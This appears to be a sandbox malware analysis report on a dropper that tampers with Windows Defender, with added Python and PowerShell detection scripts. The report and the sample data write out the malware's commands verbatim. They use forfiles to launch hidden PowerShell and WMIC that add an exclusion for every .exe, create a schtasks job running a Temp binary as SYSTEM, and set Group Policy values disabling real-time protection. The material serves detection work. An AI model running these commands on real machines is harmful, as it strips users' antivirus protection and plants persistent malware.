Source: C:\Users\user\Pictures\6dpl9L7LbyabhVQNXZXXKjGL.exe | Process created: unknown unknown (2 identical entries)
Source: C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe | Process created: unknown unknown (7 identical entries)
Source: C:\Users\user\Pictures\ikL90ODaFTS7N6FbOffM2D1B.exe | Process created: unknown unknown (2 identical entries)
Source: C:\Users\user\Pictures\G3pV8gTsWQBVrGpK4ooPrlxI.exe | Process created: unknown unknown (2 identical entries)
Source: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe | Process created: unknown unknown
Source: C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exe | Process created: unknown unknown
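The Install.exe, cmd.exe and powershell.exe entries above form one chain: Install.exe launches the built-in forfiles.exe with a /c command so that a signed Windows tool, not the dropper, proxy-executes cmd.exe; cmd.exe starts a hidden PowerShell, which in turn runs WMIC against the root\Microsoft\Windows\Defender namespace to add a Defender exclusion for every file with the exe extension. The same dropper registers a scheduled task that runs a binary from the user's Temp directory as SYSTEM. The following is an added detection example, not from the Joe Sandbox report or any vendor, run over process-creation lines constructed from these entries (with a " | " separator between the Source and behaviour columns; a forfiles.exe-to-cmd.exe line is included to close the chain because the excerpt does not list it). The rule names, and linking parent to child by image path because the report carries no PIDs, are assumptions of the example.

```python
"""Flag Defender-tampering and SYSTEM-persistence command lines in a
process-creation trace and reconstruct the parent chain for each hit.

Added example (not from the Joe Sandbox report or any vendor). Input lines
are constructed from the report's entries in the form
'Source: <parent> | Process created: <child image> <command line>'; the
rule names, and linking parent to child by image path (the report carries
no PIDs), are assumptions of this example."""
import re

# Constructed sample. The forfiles.exe -> cmd.exe line is added here to
# close the chain; the report excerpt lists the other four as observed.
SAMPLE_PROCESS_EVENTS = r"""
Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exe | Process created: C:\Windows\SysWOW64\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 21:38:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe\" em /VNsite_idnLd 385118 /S" /V1 /F
Source: C:\Windows\SysWOW64\forfiles.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\wbem\WMIC.exe "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe" C:\Users\user\notes.txt
"""

PROC_RE = re.compile(
    r"^Source: (?P<parent>.+?) \| Process created: (?P<child>.+?\.exe) (?P<cmdline>.*)$", re.I)


def schtasks_system_from_user_dir(text):
    """schtasks /CREATE running as SYSTEM with the task binary under a
    user-writable root (Users, ProgramData or Windows\\Temp). The /TR path
    is cut at the first quote or space, which is enough for the root check."""
    if not re.search(r"\bschtasks(?:\.exe)?\b.*/create\b", text, re.I):
        return False
    runas = re.search(r'/ru\s+"?(?:nt authority\\)?system"?', text, re.I)
    task = re.search(r'/tr\s+"?\\?"?(?P<path>[A-Za-z]:\\[^"]+?)(?:\\"|"|\s)', text, re.I)
    return bool(runas and task and
                re.match(r"[A-Za-z]:\\(?:Users|ProgramData|Windows\\Temp)\\", task["path"], re.I))


RULES = {
    # WMIC against the Defender WMI provider, or the Add-MpPreference cmdlet,
    # adding an extension, path or process exclusion.
    "defender_exclusion_added": lambda t: bool(re.search(
        r"MSFT_MpPreference\b.*\bcall\s+Add\b.*\bExclusion(?:Extension|Path|Process)=|"
        r"Add-MpPreference\b.*-Exclusion(?:Path|Extension|Process)\b", t, re.I)),
    # forfiles.exe used as a launcher: its /c command runs for each matched file.
    "forfiles_proxy_execution": lambda t: bool(re.search(r"\bforfiles(?:\.exe)?\b.*\s/c\s", t, re.I)),
    "hidden_powershell": lambda t: bool(re.search(r"\bpowershell(?:\.exe)?\b.*-windowstyle\s+hidden", t, re.I)),
    "schtasks_system_from_user_dir": schtasks_system_from_user_dir,
}


def parse_process_events(text):
    events = []
    for line in text.splitlines():
        m = PROC_RE.match(line.strip())
        if m:
            events.append((m["parent"], m["child"], m["cmdline"]))
    return events


def lineage(child, parent_of):
    """Walk the parent map from child to root; returns image basenames root-first."""
    chain, cur = [child], child
    while cur in parent_of and parent_of[cur] not in chain:
        cur = parent_of[cur]
        chain.append(cur)
    return [p.rsplit("\\", 1)[-1] for p in reversed(chain)]


def analyze(text):
    """Apply every rule to '<child image> <command line>' of each event and
    attach the reconstructed parent chain to each hit."""
    events = parse_process_events(text)
    parent_of = {child: parent for parent, child, _ in events}
    findings = []
    for parent, child, cmdline in events:
        subject = f"{child} {cmdline}"
        for name, rule in RULES.items():
            if rule(subject):
                findings.append({"rule": name, "child": child, "lineage": lineage(child, parent_of)})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_PROCESS_EVENTS):
        print(f"{f['rule']:32} {' -> '.join(f['lineage'])}")
```

The exclusion rule fires on every hop of the chain because each hop carries the full command string in its arguments; in practice the WMIC.exe hit with the Install.exe -> forfiles.exe -> cmd.exe -> powershell.exe -> WMIC.exe lineage is the one to alert on, since that is where the exclusion is actually applied.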
Source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006A49000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006A39000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006B79000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: TrayNotifyWndShell_TrayWnd
Source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006A49000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006A39000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006B79000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWndtooltips_class32SVWU
Source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006A49000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006A39000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006B79000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWndtooltips_class32S
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Code function: 4_2_00409D1B cpuid 4_2_00409D1B
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,4_2_00420063
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Code function: GetLocaleInfoW,4_2_004208CE
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Code function: EnumSystemLocalesW,4_2_004170F1
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_0042099B
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Code function: EnumSystemLocalesW,4_2_004202DB
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Code function: EnumSystemLocalesW,4_2_00420326
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Code function: EnumSystemLocalesW,4_2_004203C1
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,4_2_0042044E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Code function: GetLocaleInfoW,4_2_004174E4
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Code function: GetLocaleInfoW,4_2_0042069E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_004207C7
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,11_2_00420063
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Code function: GetLocaleInfoW,11_2_004208CE
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Code function: EnumSystemLocalesW,11_2_004170F1
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,11_2_0042099B
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Code function: EnumSystemLocalesW,11_2_004202DB
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Code function: EnumSystemLocalesW,11_2_00420326
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Code function: EnumSystemLocalesW,11_2_004203C1
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,11_2_0042044E
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Code function: GetLocaleInfoW,11_2_004174E4
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Code function: GetLocaleInfoW,11_2_0042069E
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,11_2_004207C7
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Code function: EnumSystemLocalesW,11_2_05BD058D
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Code function: EnumSystemLocalesW,11_2_05BD0542
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,11_2_05BD0C02
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Code function: GetLocaleInfoW,11_2_05BC774B
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Code function: EnumSystemLocalesW,11_2_05BD0628
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Code function: GetLocaleInfoW,11_2_05BD0905
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Code function: GetLocaleInfoW,11_2_05BD0903
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Code function: GetLocaleInfoW,11_2_05BD0B35
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Code function: EnumSystemLocalesW,11_2_05BC7358
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,11_2_05BD02CA
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,11_2_05BD0A2E
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,19_2_00420063
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Code function: GetLocaleInfoW,19_2_004208CE
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Code function: EnumSystemLocalesW,19_2_004170F1
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,19_2_0042099B
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Code function: EnumSystemLocalesW,19_2_004202DB
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Code function: EnumSystemLocalesW,19_2_00420326
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Code function: EnumSystemLocalesW,19_2_004203C1
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,19_2_0042044E
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Code function: GetLocaleInfoW,19_2_004174E4
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Code function: GetLocaleInfoW,19_2_0042069E
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,19_2_004207C7
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Code function: EnumSystemLocalesW,19_2_05D0058D
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Code function: EnumSystemLocalesW,19_2_05D00542
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,19_2_05D00C02
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Code function: GetLocaleInfoW,19_2_05CF774B
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Code function: EnumSystemLocalesW,19_2_05D00628
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Code function: GetLocaleInfoW,19_2_05D00903
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Code function: GetLocaleInfoW,19_2_05D00905
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Code function: EnumSystemLocalesW,19_2_05CF7358
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Code function: GetLocaleInfoW,19_2_05D00B35
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,19_2_05D002CA
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,19_2_05D00A2E
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,21_2_00420063
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | Code function: GetLocaleInfoW,21_2_004208CE
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | Code function: EnumSystemLocalesW,21_2_004170F1
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,21_2_0042099B
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | Code function: EnumSystemLocalesW,21_2_004202DB
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | Code function: EnumSystemLocalesW,21_2_00420326
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | Code function: EnumSystemLocalesW,21_2_004203C1
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,21_2_0042044E
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | Code function: GetLocaleInfoW,21_2_004174E4
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | Code function: GetLocaleInfoW,21_2_0042069E
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,21_2_004207C7
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,21_2_041E0C02
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | Code function: EnumSystemLocalesW,21_2_041E0542
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | Code function: EnumSystemLocalesW,21_2_041E058D
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | Code function: EnumSystemLocalesW,21_2_041E0628
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | Code function: GetLocaleInfoW,21_2_041D774B
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | Code function: GetLocaleInfoW,21_2_041E0905
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | Code function: GetLocaleInfoW,21_2_041E0903
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,21_2_041E0A2E
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,21_2_041E02CA
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | Code function: GetLocaleInfoW,21_2_041E0B35
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | Code function: EnumSystemLocalesW,21_2_041D7358
Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (2 identical entries)
Source: C:\Users\user\AppData\Local\Temp\u69w.0.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (2 identical entries)
Source: C:\Users\user\AppData\Local\Temp\u69w.1.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe | Queries volume information: C:\ VolumeInformation (2 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\u69w.0.exe | Queries volume information: C:\ VolumeInformation (2 identical entries)
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\ff086fda VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\u4dc.0.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\UWxz0MPLJemfxFfuxrp6E5vU.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF63862B180 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF63862B180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{AF4B7D10-C04F-40BD-A9F0-1F789BBF0FCA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions | Registry value created: Exclusions_Extensions 1
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{AF4B7D10-C04F-40BD-A9F0-1F789BBF0FCA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender | Registry value created: DisableAntiSpyware 1
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{AF4B7D10-C04F-40BD-A9F0-1F789BBF0FCA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender | Registry value created: DisableRoutinelyTakingAction 1
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{AF4B7D10-C04F-40BD-A9F0-1F789BBF0FCA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | Registry value created: DisableBehaviorMonitoring 1
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{AF4B7D10-C04F-40BD-A9F0-1F789BBF0FCA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | Registry value created: DisableOnAccessProtection 1
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{AF4B7D10-C04F-40BD-A9F0-1F789BBF0FCA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | Registry value created: DisableScanOnRealtimeEnable 1
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{AF4B7D10-C04F-40BD-A9F0-1F789BBF0FCA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{AF4B7D10-C04F-40BD-A9F0-1F789BBF0FCA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | Registry value created: DisableIOAVProtection 1
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{AF4B7D10-C04F-40BD-A9F0-1F789BBF0FCA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | Registry value created: DisableRawWriteNotification 1
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{3FAACE9B-0B9D-4D37-90B5-C9D5F39DABA7}Machine\SOFTWARE\Policies\Microsoft\Windows Defender | Registry value created: DisableAntiSpyware 1
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{3FAACE9B-0B9D-4D37-90B5-C9D5F39DABA7}Machine\SOFTWARE\Policies\Microsoft\Windows Defender | Registry value created: DisableRoutinelyTakingAction 1
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{3FAACE9B-0B9D-4D37-90B5-C9D5F39DABA7}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions | Registry value created: Exclusions_Extensions 1
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{3FAACE9B-0B9D-4D37-90B5-C9D5F39DABA7}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | Registry value created: DisableBehaviorMonitoring 1
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{3FAACE9B-0B9D-4D37-90B5-C9D5F39DABA7}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | Registry value created: DisableOnAccessProtection 1
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{3FAACE9B-0B9D-4D37-90B5-C9D5F39DABA7}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | Registry value created: DisableScanOnRealtimeEnable 1
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{3FAACE9B-0B9D-4D37-90B5-C9D5F39DABA7}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{3FAACE9B-0B9D-4D37-90B5-C9D5F39DABA7}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | Registry value created: DisableIOAVProtection 1
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{3FAACE9B-0B9D-4D37-90B5-C9D5F39DABA7}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | Registry value created: DisableRawWriteNotification 1
Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | Registry value created: Exclusions_Extensions 1
Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exe | Registry value created: Exclusions_Extensions 1
Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | File written: C:\Windows\System32\GroupPolicy\gpt.ini
Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1495305940.00000000006CE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : Select * From AntiVirusProduct
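The entries above show the sample disabling Windows Defender by policy rather than by touching Defender's own keys: it stages DisableAntiSpyware, the Real-Time Protection Disable* values and an Exclusions_Extensions policy under the per-GPO registry cache in HKCU ({GUID}Machine\SOFTWARE\Policies\Microsoft\Windows Defender) and rewrites C:\Windows\System32\GroupPolicy\gpt.ini, so the settings are applied by Group Policy processing and survive a plain "turn real-time protection back on". The script below is an added host check written for this page, not code from the report or the sample: it looks for the same value names in that HKCU cache, in the applied machine policy under HKLM, in gpt.ini and in the live Defender state. The GUIDs are sample specific, so it matches on value names rather than on GUIDs; run it from an elevated PowerShell.

```powershell
# Added example (not from the Joe Sandbox report): look for the Defender policy tampering
# described above. Matching is on value names, since the {GUID} keys differ per infection.

$tamperValues = @(
    'DisableAntiSpyware', 'DisableRoutinelyTakingAction', 'DisableBehaviorMonitoring',
    'DisableOnAccessProtection', 'DisableScanOnRealtimeEnable', 'DisableRealtimeMonitoring',
    'DisableIOAVProtection', 'DisableRawWriteNotification'
)
$findings = [System.Collections.Generic.List[object]]::new()

function Test-DefenderPolicyKey {
    param([string]$KeyPath, [string]$Origin)
    # The sample wrote to the base key, to Real-Time Protection and to Exclusions; the
    # Exclusions\* subkeys hold the actual excluded extensions/paths/processes.
    $subKeys = @('', 'Real-Time Protection', 'Exclusions',
                 'Exclusions\Extensions', 'Exclusions\Paths', 'Exclusions\Processes')
    foreach ($sub in $subKeys) {
        $p = if ($sub) { Join-Path $KeyPath $sub } else { $KeyPath }
        if (-not (Test-Path -LiteralPath $p)) { continue }
        $key = Get-Item -LiteralPath $p
        foreach ($name in $key.GetValueNames()) {
            $val = $key.GetValue($name)
            $isDisable  = ($tamperValues -contains $name) -and ($val -eq 1)
            $isExclList = $sub -like 'Exclusions\*'          # any entry here is an exclusion
            if ($isDisable -or ($name -like 'Exclusions_*') -or $isExclList) {
                $findings.Add([pscustomobject]@{ Origin = $Origin; Key = $p; Name = $name; Value = $val })
            }
        }
    }
}
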